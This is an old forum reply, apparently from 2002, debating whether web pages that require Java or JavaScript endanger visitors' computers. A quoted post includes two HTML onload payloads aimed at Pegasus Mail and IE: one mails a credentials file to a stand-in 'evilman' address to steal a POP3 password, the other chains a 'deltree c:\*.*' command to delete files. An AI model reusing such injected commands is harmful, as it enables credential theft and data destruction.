Re: techport80

new topic     » goto parent     » topic index » view thread      » older message » newer message 

On 18 Sep 2002, at 14:22, Martin Stachon wrote:

> 
> Kat wrote:
> >  If you have IE 6.x it may be a bit harder to disable Java, since MS has
> >  taken
> >  
> > away many of those settings which allow you to close the backdoors and 
> > loopholes. Javascript is even worse. Do you want to show webpages, or do you
> > want people to open up their computers to any ole script kiddie? If you
> > require me to breach security on my computers to see your webpages, let me
> > assure you it's not worth it.
> 
> You are never safe on a system where web broswer runs under root privilegies.
> Even with all scripting disabled.
> 
> Eg. with Pegasus Mail v3.12c and IE using this HTML:
> 
>     <body onload="mailto:evilman at here.com -F c:\pmail\mail\Kat\pmail.ini">
>
> I can possibly obtain your POP3 password. Or this :
> 
>     <body onload="mailto:evilman at here.com -F c:\test.txt | deltree c:\*.*">
> 
> may delete some files. 

Too bad i intentionally didn't download all the Pegasus display/scripting files,
and Pegasus has no clue where the IE display engine is, eh? blink

>Somebody who is about security should be running
> at least Win2000. (But I am on Win98 blink

On the other hand, at one time programmers were in such a rush to add 
features, the code wasn't made abuse-proof. So upgrading could actually 
install be more of a problem than anything it could be fixing.

Kat

new topic     » goto parent     » topic index » view thread      » older message » newer message

Search



Quick Links

User menu

Not signed in.

Misc Menu